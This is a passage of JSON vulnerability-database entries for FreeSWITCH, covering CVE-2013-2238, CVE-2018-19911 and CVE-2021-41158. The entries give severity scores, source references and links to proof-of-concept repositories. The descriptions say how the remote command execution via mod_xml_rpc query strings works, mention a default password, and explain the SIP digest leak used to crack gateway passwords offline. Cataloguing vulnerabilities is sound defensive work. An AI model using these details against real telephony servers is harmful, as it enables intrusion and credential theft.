"trust": 0.6,
"url": "http://www.securityfocus.com/bid/60890"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-62240"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"db": "NVD",
"id": "CVE-2013-2238"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-62240"
},
{
"db": "BID",
"id": "60890"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"db": "NVD",
"id": "CVE-2013-2238"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-30T00:00:00",
"db": "VULHUB",
"id": "VHN-62240"
},
{
"date": "2013-07-02T00:00:00",
"db": "BID",
"id": "60890"
},
{
"date": "2013-10-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"date": "2013-09-30T22:55:04.697000",
"db": "NVD",
"id": "CVE-2013-2238"
},
{
"date": "2013-07-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-62240"
},
{
"date": "2013-07-04T07:11:00",
"db": "BID",
"id": "60890"
},
{
"date": "2013-10-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004418"
},
{
"date": "2013-10-11T14:52:16.393000",
"db": "NVD",
"id": "CVE-2013-2238"
},
{
"date": "2013-10-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH of switch_regex.c of switch_perform_substitution Buffer overflow vulnerability in functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004418"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-077"
}
],
"trust": 0.6
}
}
VAR-201812-1006
Vulnerability from variot - Updated: 2023-12-18 12:43FreeSWITCH through 1.8.2, when mod_xml_rpc is enabled, allows remote attackers to execute arbitrary commands via the api/system or txtapi/system (or api/bg_system or txtapi/bg_system) query string on TCP port 8080, as demonstrated by an api/system?calc URI. This can also be exploited via CSRF. Alternatively, the default password of works for the freeswitch account can sometimes be used. FreeSWITCH Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FreeSWITCH is a set of free and open source communication software developed by American software developer Anthony Minesale. The software can be used to create audio, video and short message products and applications. The mod_xml_rpc module is one of the modules that supports triggering the API from the web control. There is a security vulnerability in the mod_xml_rpc module in FreeSWITCH 1.8.2 and earlier versions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201812-1006",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lte",
"trust": 1.8,
"vendor": "freeswitch",
"version": "1.8.2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"db": "NVD",
"id": "CVE-2018-19911"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.8.2",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-19911"
}
]
},
"cve": "CVE-2018-19911",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "High",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.6,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-19911",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "VHN-130618",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-19911",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-19911",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201812-259",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-130618",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-19911",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-130618"
},
{
"db": "VULMON",
"id": "CVE-2018-19911"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"db": "NVD",
"id": "CVE-2018-19911"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-259"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH through 1.8.2, when mod_xml_rpc is enabled, allows remote attackers to execute arbitrary commands via the api/system or txtapi/system (or api/bg_system or txtapi/bg_system) query string on TCP port 8080, as demonstrated by an api/system?calc URI. This can also be exploited via CSRF. Alternatively, the default password of works for the freeswitch account can sometimes be used. FreeSWITCH Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FreeSWITCH is a set of free and open source communication software developed by American software developer Anthony Minesale. The software can be used to create audio, video and short message products and applications. The mod_xml_rpc module is one of the modules that supports triggering the API from the web control. There is a security vulnerability in the mod_xml_rpc module in FreeSWITCH 1.8.2 and earlier versions",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-19911"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"db": "VULHUB",
"id": "VHN-130618"
},
{
"db": "VULMON",
"id": "CVE-2018-19911"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-19911",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014321",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201812-259",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-130618",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-19911",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-130618"
},
{
"db": "VULMON",
"id": "CVE-2018-19911"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"db": "NVD",
"id": "CVE-2018-19911"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-259"
}
]
},
"id": "VAR-201812-1006",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-130618"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:43:43.512000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://freeswitch.com/"
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xt11/cve-poc "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/poc-in-github "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-19911"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 1.1
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-130618"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"db": "NVD",
"id": "CVE-2018-19911"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/isafeblue/freeswitch_rce/blob/master/readme-en.md"
},
{
"trust": 1.8,
"url": "https://github.com/isafeblue/freeswitch_rce/blob/master/freeswitch_rce.py"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-19911"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-19911"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/0xt11/cve-poc"
},
{
"trust": 0.1,
"url": "https://github.com/nomi-sec/poc-in-github"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-130618"
},
{
"db": "VULMON",
"id": "CVE-2018-19911"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"db": "NVD",
"id": "CVE-2018-19911"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-259"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-130618"
},
{
"db": "VULMON",
"id": "CVE-2018-19911"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"db": "NVD",
"id": "CVE-2018-19911"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-259"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-06T00:00:00",
"db": "VULHUB",
"id": "VHN-130618"
},
{
"date": "2018-12-06T00:00:00",
"db": "VULMON",
"id": "CVE-2018-19911"
},
{
"date": "2019-03-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"date": "2018-12-06T18:29:00.297000",
"db": "NVD",
"id": "CVE-2018-19911"
},
{
"date": "2018-12-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-259"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-130618"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2018-19911"
},
{
"date": "2019-03-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-014321"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2018-19911"
},
{
"date": "2020-10-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201812-259"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-259"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014321"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201812-259"
}
],
"trust": 0.6
}
}
VAR-202110-1371
Vulnerability from variot - Updated: 2023-12-18 12:42FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in sofia_reg.c, sofia_reg_handle_sip_r_challenge() which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges. FreeSWITCH There is a vulnerability related to information leakage.Information may be obtained
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1371",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lt",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.10.7"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": null
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.10.7"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"db": "NVD",
"id": "CVE-2021-41158"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.10.7",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-41158"
}
]
},
"cve": "CVE-2021-41158",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2021-41158",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-402381",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-41158",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-41158",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2021-41158",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-1762",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-402381",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-402381"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"db": "NVD",
"id": "CVE-2021-41158"
},
{
"db": "NVD",
"id": "CVE-2021-41158"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH\u0027s SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH\u0027s network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges. FreeSWITCH There is a vulnerability related to information leakage.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-41158"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"db": "VULHUB",
"id": "VHN-402381"
},
{
"db": "VULMON",
"id": "CVE-2021-41158"
}
],
"trust": 1.8
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-402381",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-402381"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-41158",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014049",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164622",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1762",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-402381",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-41158",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-402381"
},
{
"db": "VULMON",
"id": "CVE-2021-41158"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"db": "NVD",
